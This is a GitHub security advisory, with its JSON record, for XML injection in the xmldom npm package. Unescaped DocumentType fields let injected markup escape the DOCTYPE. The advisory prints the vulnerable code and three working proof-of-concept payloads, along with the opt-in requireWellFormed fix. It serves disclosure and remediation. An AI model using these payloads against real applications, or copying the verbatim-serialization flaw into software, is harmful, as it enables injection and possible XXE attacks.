GHSA-F6WW-3GGP-FR8H

Vulnerability from github – Published: 2026-04-22 20:19 – Updated: 2026-04-22 20:19
VLAI?
Summary
xmldom has XML injection through unvalidated DocumentType serialization
Details

Summary

The package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim without any escaping or validation. When these fields are set programmatically to attacker-controlled strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is terminated early and arbitrary markup appears outside it.


Details

DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset) validates only qualifiedName against the XML QName production. The remaining three arguments are stored as-is with no validation.

The XMLSerializer emits DocumentType nodes as:

<!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]>

All fields are pushed into the output buffer verbatim — no escaping, no quoting added.

internalSubset injection: The serializer wraps internalSubset with [ and ]. A value containing ]> closes the internal subset and the DOCTYPE declaration at the injection point. Any content after ]> in internalSubset appears outside the DOCTYPE in the serialized output as raw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: @xmldom/xmldom ≥ 0.9.0 via createDocumentType API; 0.8.x only via direct property write.

publicId injection: The serializer emits publicId verbatim after PUBLIC with no quoting added. A value containing an injected system identifier (e.g., "pubid" SYSTEM "evil") breaks the intended quoting context, injecting a fake SYSTEM entry into the serialized DOCTYPE declaration. Identified during internal security research. Affected: both branches, all versions back to 0.1.0.

systemId injection: The serializer emits systemId verbatim. A value containing > terminates the DOCTYPE declaration early; content after > appears as raw XML markup outside the DOCTYPE context. Identified during internal security research. Affected: both branches, all versions back to 0.1.0.

The parse path is safe: the SAX parser enforces the PubidLiteral and SystemLiteral grammar productions, which exclude the relevant characters, and the internal subset parser only accepts a subset it can structurally validate. The vulnerability is reachable only through programmatic createDocumentType calls with attacker-controlled arguments.


Affected code

lib/dom.jscreateDocumentType (lines 898–910):

createDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {
    validateQualifiedName(qualifiedName);          // only qualifiedName is validated
    var node = new DocumentType(PDC);
    node.name = qualifiedName;
    node.nodeName = qualifiedName;
    node.publicId = publicId || '';               // stored verbatim
    node.systemId = systemId || '';               // stored verbatim
    node.internalSubset = internalSubset || '';   // stored verbatim
    node.childNodes = new NodeList();
    return node;
},

lib/dom.js — serializer DOCTYPE case (lines 2948–2964):

case DOCUMENT_TYPE_NODE:
    var pubid = node.publicId;
    var sysid = node.systemId;
    buf.push(g.DOCTYPE_DECL_START, ' ', node.name);
    if (pubid) {
        buf.push(' ', g.PUBLIC, ' ', pubid);
        if (sysid && sysid !== '.') {
            buf.push(' ', sysid);
        }
    } else if (sysid && sysid !== '.') {
        buf.push(' ', g.SYSTEM, ' ', sysid);
    }
    if (node.internalSubset) {
        buf.push(' [', node.internalSubset, ']');  // internalSubset emitted verbatim
    }
    buf.push('>');
    return;

PoC

internalSubset injection

const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
    'root',
    '',
    '',
    ']><injected/><![CDATA['
);
const doc = impl.createDocument(null, 'root', doctype);
const xml = new XMLSerializer().serializeToString(doc);
console.log(xml);
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
//                   ^^^^^^^^^^  injected element outside DOCTYPE

publicId quoting context break

const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
    'root',
    '"injected PUBLIC_ID" SYSTEM "evil"',
    '',
    ''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root PUBLIC "injected PUBLIC_ID" SYSTEM "evil"><root/>
// quoting context broken — SYSTEM entry injected

systemId injection

const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
    'root',
    '',
    '"sysid"><injected attr="pwn"/>',
    ''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root SYSTEM "sysid"><injected attr="pwn"/>><root/>
// > in sysid closes DOCTYPE early; <injected/> appears as sibling element

Impact

An application that programmatically constructs DocumentType nodes from user-controlled data and then serializes the document can emit a DOCTYPE declaration where the internal subset is closed early or where injected SYSTEM entities or other declarations appear in the serialized output.

Downstream XML parsers that re-parse the serialized output and expand entities from the injected DOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.


Fix Applied

⚠ Opt-in required. Protection is not automatic. Existing serialization calls remain vulnerable unless { requireWellFormed: true } is explicitly passed. Applications that pass untrusted data to createDocumentType() or write untrusted values directly to a DocumentType node's publicId, systemId, or internalSubset properties should audit all serializeToString() call sites and add the option.

XMLSerializer.serializeToString() now accepts an options object as a second argument. When { requireWellFormed: true } is passed, the serializer validates the DocumentType node's publicId, systemId, and internalSubset fields before emitting the DOCTYPE declaration and throws InvalidStateError if any field contains an injection sequence:

  • publicId: throws if non-empty and does not match the XML PubidLiteral production (XML 1.0 [12])
  • systemId: throws if non-empty and does not match the XML SystemLiteral production (XML 1.0 [11])
  • internalSubset: throws if it contains ]> (which closes the internal subset and DOCTYPE declaration early)

All three checks apply regardless of how the invalid value entered the node — whether via createDocumentType arguments or a subsequent direct property write.

PoC — fixed path

const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

// internalSubset injection
const dt1 = impl.createDocumentType('root', '', '', ']><injected/><![CDATA[');
const doc1 = impl.createDocument(null, 'root', dt1);

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc1));
// <!DOCTYPE root []><injected/><![CDATA[]><root/>

// Opt-in guard: throws InvalidStateError
try {
  new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: DocumentType internalSubset contains "]>"
}

The guard also covers post-creation property writes:

const dt2 = impl.createDocumentType('root', '', '');
dt2.systemId = '"sysid"><injected attr="pwn"/>';
const doc2 = impl.createDocument(null, 'root', dt2);
new XMLSerializer().serializeToString(doc2, { requireWellFormed: true });
// InvalidStateError: DocumentType systemId is not a valid SystemLiteral

Why the default stays verbatim

The W3C DOM Parsing and Serialization spec §3.2.1.3 defines a require well-formed flag whose default value is false. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in requireWellFormed: true flag allows applications that require injection safety to enable strict mode without breaking existing deployments.

Residual limitation

createDocumentType(qualifiedName, publicId, systemId[, internalSubset]) does not validate publicId, systemId, or internalSubset at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.

When the default serialization path is used (without requireWellFormed: true), all three fields are still emitted verbatim. Applications that do not pass requireWellFormed: true remain exposed.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@xmldom/xmldom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@xmldom/xmldom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.9.0"
            },
            {
              "fixed": "0.9.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "xmldom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41674"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-91"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T20:19:12Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe package serializes `DocumentType` node fields (`internalSubset`, `publicId`, `systemId`) verbatim\nwithout any escaping or validation. When these fields are set programmatically to attacker-controlled\nstrings, `XMLSerializer.serializeToString` can produce output where the DOCTYPE declaration is\nterminated early and arbitrary markup appears outside it.\n\n---\n\n## Details\n\n`DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset)` validates\nonly `qualifiedName` against the XML QName production. The remaining three arguments are stored\nas-is with no validation.\n\nThe XMLSerializer emits `DocumentType` nodes as:\n\n```\n\u003c!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]\u003e\n```\n\nAll fields are pushed into the output buffer verbatim \u2014 no escaping, no quoting added.\n\n**`internalSubset` injection:** The serializer wraps `internalSubset` with ` [` and `]`. A value\ncontaining `]\u003e` closes the internal subset and the DOCTYPE declaration at the injection point.\nAny content after `]\u003e` in `internalSubset` appears outside the DOCTYPE in the serialized output as\nraw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: `@xmldom/xmldom` \u2265 0.9.0\nvia `createDocumentType` API; 0.8.x only via direct property write.\n\n**`publicId` injection:** The serializer emits `publicId` verbatim after `PUBLIC` with no\nquoting added. A value containing an injected system identifier (e.g.,\n`\"pubid\" SYSTEM \"evil\"`) breaks the intended quoting context, injecting a fake SYSTEM entry\ninto the serialized DOCTYPE declaration. Identified during internal security research. Affected:\nboth branches, all versions back to 0.1.0.\n\n**`systemId` injection:** The serializer emits `systemId` verbatim. A value containing `\u003e`\nterminates the DOCTYPE declaration early; content after `\u003e` appears as raw XML markup outside\nthe DOCTYPE context. Identified during internal security research. Affected: both branches, all\nversions back to 0.1.0.\n\nThe parse path is safe: the SAX parser enforces the `PubidLiteral` and `SystemLiteral` grammar\nproductions, which exclude the relevant characters, and the internal subset parser only accepts a\nsubset it can structurally validate. The vulnerability is reachable only through programmatic\n`createDocumentType` calls with attacker-controlled arguments.\n\n---\n\n## Affected code\n\n**`lib/dom.js` \u2014 `createDocumentType` (lines 898\u2013910):**\n\n```js\ncreateDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {\n    validateQualifiedName(qualifiedName);          // only qualifiedName is validated\n    var node = new DocumentType(PDC);\n    node.name = qualifiedName;\n    node.nodeName = qualifiedName;\n    node.publicId = publicId || \u0027\u0027;               // stored verbatim\n    node.systemId = systemId || \u0027\u0027;               // stored verbatim\n    node.internalSubset = internalSubset || \u0027\u0027;   // stored verbatim\n    node.childNodes = new NodeList();\n    return node;\n},\n```\n\n**`lib/dom.js` \u2014 serializer DOCTYPE case (lines 2948\u20132964):**\n\n```js\ncase DOCUMENT_TYPE_NODE:\n    var pubid = node.publicId;\n    var sysid = node.systemId;\n    buf.push(g.DOCTYPE_DECL_START, \u0027 \u0027, node.name);\n    if (pubid) {\n        buf.push(\u0027 \u0027, g.PUBLIC, \u0027 \u0027, pubid);\n        if (sysid \u0026\u0026 sysid !== \u0027.\u0027) {\n            buf.push(\u0027 \u0027, sysid);\n        }\n    } else if (sysid \u0026\u0026 sysid !== \u0027.\u0027) {\n        buf.push(\u0027 \u0027, g.SYSTEM, \u0027 \u0027, sysid);\n    }\n    if (node.internalSubset) {\n        buf.push(\u0027 [\u0027, node.internalSubset, \u0027]\u0027);  // internalSubset emitted verbatim\n    }\n    buf.push(\u0027\u003e\u0027);\n    return;\n```\n\n---\n\n## PoC\n\n### internalSubset injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n    \u0027root\u0027,\n    \u0027\u0027,\n    \u0027\u0027,\n    \u0027]\u003e\u003cinjected/\u003e\u003c![CDATA[\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n//                   ^^^^^^^^^^  injected element outside DOCTYPE\n```\n\n### publicId quoting context break\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n    \u0027root\u0027,\n    \u0027\"injected PUBLIC_ID\" SYSTEM \"evil\"\u0027,\n    \u0027\u0027,\n    \u0027\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root PUBLIC \"injected PUBLIC_ID\" SYSTEM \"evil\"\u003e\u003croot/\u003e\n// quoting context broken \u2014 SYSTEM entry injected\n```\n\n### systemId injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n    \u0027root\u0027,\n    \u0027\u0027,\n    \u0027\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u0027,\n    \u0027\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root SYSTEM \"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u003e\u003croot/\u003e\n// \u003e in sysid closes DOCTYPE early; \u003cinjected/\u003e appears as sibling element\n```\n\n---\n\n## Impact\n\nAn application that programmatically constructs `DocumentType` nodes from user-controlled data and\nthen serializes the document can emit a DOCTYPE declaration where the internal subset is closed\nearly or where injected SYSTEM entities or other declarations appear in the serialized output.\n\nDownstream XML parsers that re-parse the serialized output and expand entities from the injected\nDOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.\n\n---\n\n## Fix Applied\n\n\u003e **\u26a0 Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createDocumentType()` or write untrusted values directly to a\n\u003e `DocumentType` node\u0027s `publicId`, `systemId`, or `internalSubset` properties should audit\n\u003e all `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer validates the `DocumentType` node\u0027s `publicId`, `systemId`, and `internalSubset` fields before emitting the DOCTYPE declaration and throws `InvalidStateError` if any field contains an injection sequence:\n\n- **`publicId`**: throws if non-empty and does not match the XML `PubidLiteral` production (XML 1.0 [12])\n- **`systemId`**: throws if non-empty and does not match the XML `SystemLiteral` production (XML 1.0 [11])\n- **`internalSubset`**: throws if it contains `]\u003e` (which closes the internal subset and DOCTYPE declaration early)\n\nAll three checks apply regardless of how the invalid value entered the node \u2014 whether via `createDocumentType` arguments or a subsequent direct property write.\n\n### PoC \u2014 fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\nconst impl = new DOMImplementation();\n\n// internalSubset injection\nconst dt1 = impl.createDocumentType(\u0027root\u0027, \u0027\u0027, \u0027\u0027, \u0027]\u003e\u003cinjected/\u003e\u003c![CDATA[\u0027);\nconst doc1 = impl.createDocument(null, \u0027root\u0027, dt1);\n\n// Default (unchanged): verbatim \u2014 injection present\nconsole.log(new XMLSerializer().serializeToString(doc1));\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n\n// Opt-in guard: throws InvalidStateError\ntry {\n  new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });\n} catch (e) {\n  console.log(e.name, e.message);\n  // InvalidStateError: DocumentType internalSubset contains \"]\u003e\"\n}\n```\n\nThe guard also covers post-creation property writes:\n\n```js\nconst dt2 = impl.createDocumentType(\u0027root\u0027, \u0027\u0027, \u0027\u0027);\ndt2.systemId = \u0027\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u0027;\nconst doc2 = impl.createDocument(null, \u0027root\u0027, dt2);\nnew XMLSerializer().serializeToString(doc2, { requireWellFormed: true });\n// InvalidStateError: DocumentType systemId is not a valid SystemLiteral\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec \u00a73.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\n`createDocumentType(qualifiedName, publicId, systemId[, internalSubset])` does not validate `publicId`, `systemId`, or `internalSubset` at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), all three fields are still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.",
  "id": "GHSA-f6ww-3ggp-fr8h",
  "modified": "2026-04-22T20:19:12Z",
  "published": "2026-04-22T20:19:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/xmldom/xmldom"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/releases/tag/0.8.13"
    },
    {
      "type": "WEB",
      "url": "https://github.com/xmldom/xmldom/releases/tag/0.9.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "xmldom has XML injection through unvalidated DocumentType serialization"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…